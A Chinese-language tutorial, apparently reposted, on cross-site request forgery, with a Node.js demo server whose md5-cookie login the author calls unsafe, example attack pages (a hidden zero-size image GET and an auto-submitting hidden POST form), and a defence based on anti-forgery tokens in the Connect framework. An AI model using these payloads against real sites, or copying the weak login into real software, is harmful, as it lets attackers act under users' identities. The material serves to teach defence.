CSRF攻擊原理以及nodejs的實現和防御


    一、簡介

    CSRF (Cross-site Request Forgery),中文名稱:跨站偽造。危害是攻擊者可以盜用你的身份,以你的名義發送惡意請求。比如可以盜取你的賬號,以你的身份發送郵件,購買商品等。

    二、原理

    具體的原理圖如下:

   

    更加恐怖的是使用諸如img之類的標簽,甚至不需要用戶點擊某個鏈接就可以發起攻擊,比如B網站可以添加如下代碼:

    <img src='http://www.company.com/action?k1=v1&k2=v2' width=0 height=0 />

      這里width=0 height=0 表示圖片是不可見的。這個語句會導致游覽器向另外的服務器發送一個請求。游覽器不管該圖片url實際是否指向一張圖片,只要src字段中規定了url,就會按照地址觸發這個請求。(游覽器默認都是沒有禁止下載圖片,這是因為禁用圖片后大多數web程序的可用性就會打折扣)。加載圖片根本不考慮所涉及的圖像所在位置(可以跨域)。如果A網站不小心提供了get接口就非常不幸得中招了

        三、攻擊

      淺談CSRF攻擊方式一文中已經用實例講解了一個php的實現和防御方法,我這里主要是講nodejs的實現和防御。為了簡單起見,假設我們有一個應用,它提供了兩個接口“/get/checkvalue”和 “'/post/setvalue”,它們都接受一個參數“value”來改變系統的一個某個值。 當然前提是用戶已經正常登陸了。具體邏輯是它有一個用戶登陸的過程,登陸成功后會將用戶信息存到cookie中,之后就根據cookie來判斷是否能正常訪問,當然cookie信息經過md5加密。(真實應用中千萬不要這么做,md5加密並不是非常安全)。

      服務主程序:

var app = http.createServer(function(req, res) {
  //權限判斷
  authMiddle(req, res, function(err, checkValue){
    if (!checkValue) return res.end(html_login);
    //數據查詢和操作
    controller(req, res);  
  });
});

        用戶權限判斷邏輯:

var cookieValue = crypto.createHash('md5').update('jifeng_jifeng').digest('hex');
function
getCookie(headers){ var cookies = {}; headers.cookie && headers.cookie.split(';').forEach(function(cookie) { var parts = cookie.split('='); cookies[ parts[ 0 ].trim() ] = ( parts[ 1 ] || '' ).trim(); }); return cookies; } function checkUser(req, res, callback){ var chunks = []; var length = 0; var rows = null; req.on('data', function(data){ chunks.push(data); length += data.length; }) req.on('end', function(){ var rows = new Buffer(length); var len = 0; for (var i = 0, il = chunks.length; i < il; i++) { chunks[i].copy(rows, len); len += chunks[i].length; } var args = querystring.parse(rows.toString()); if (args && args.name === 'jifeng' && args.password ==='jifeng') { res.setHeader('Set-Cookie', ['cookie1987=' + cookieValue]); callback(null, true); } else { callback(null, false); } }) } function authMiddle(req, res, callback){ var flag = false; var params = urllib.parse(req.url, true); if (params.pathname === '/checkuser') { return checkUser(req, res, callback); } else { var headers = req.headers; var cookies = getCookie(headers);//得到用戶cookie if (cookies && cookies.cookie1987) { var v = cookies.cookie1987; if (v == cookieValue) { flag = true; } } callback(null, flag) } }

      那具體怎樣進攻呢?

      get攻擊的頁面很簡單。

<img src='http://test3.data.taobao.com:5678/get/check?func=get&value=10'> 

      post攻擊的頁面相對比較復雜

  <head>
    <title>post 測試頁面</title>
    <script>
      function steal(){
        var mySubmit = document.getElementById('steal_form');
        mySubmit.submit();
      }
    </script>
  </head>
  <body onload='steal()'>
  <form id = "steal_form" method="POST" action="http://test3.data.taobao.com:5678/post/check">
    <input type="hidden" name="func" value="post">
   <input type="hidden" name="value" value="1000">
  </form>
  </body>

     但這里強調一點:現在游覽器(chrome,firfox)為了安全考慮,默認都做了一定的限制,form標簽發送到其他網站的請求會被攔截,大家有興趣模擬這種情況時需要注意這個問題。

     詳細的代碼:https://github.com/jifeng/toycode/tree/master/csrf

     四、防范

     訪問csrf的措施雖然很多,但歸根到底就是一條:在客戶端提交請求時增加偽造隨機數。

     nodejs中有些框架已經幫我們做了這件事,比如重用的connect

   它具體的實現:

     http://www.senchalabs.org/connect/csrf.html   

     舉例:

     https://github.com/senchalabs/connect/blob/master/examples/csrf.js

    實現還是相對比較簡單,有興趣的同學可以再仔細看下。

 

 

參考文章:

淺談CSRF攻擊方式


免責聲明!

本站轉載的文章為個人學習借鑒使用,本站對版權不負任何法律責任。如果侵犯了您的隱私權益,請聯系本站郵箱yoyou2525@163.com刪除。



 
粵ICP備18138465號   © 2018-2025 CODEPRJ.COM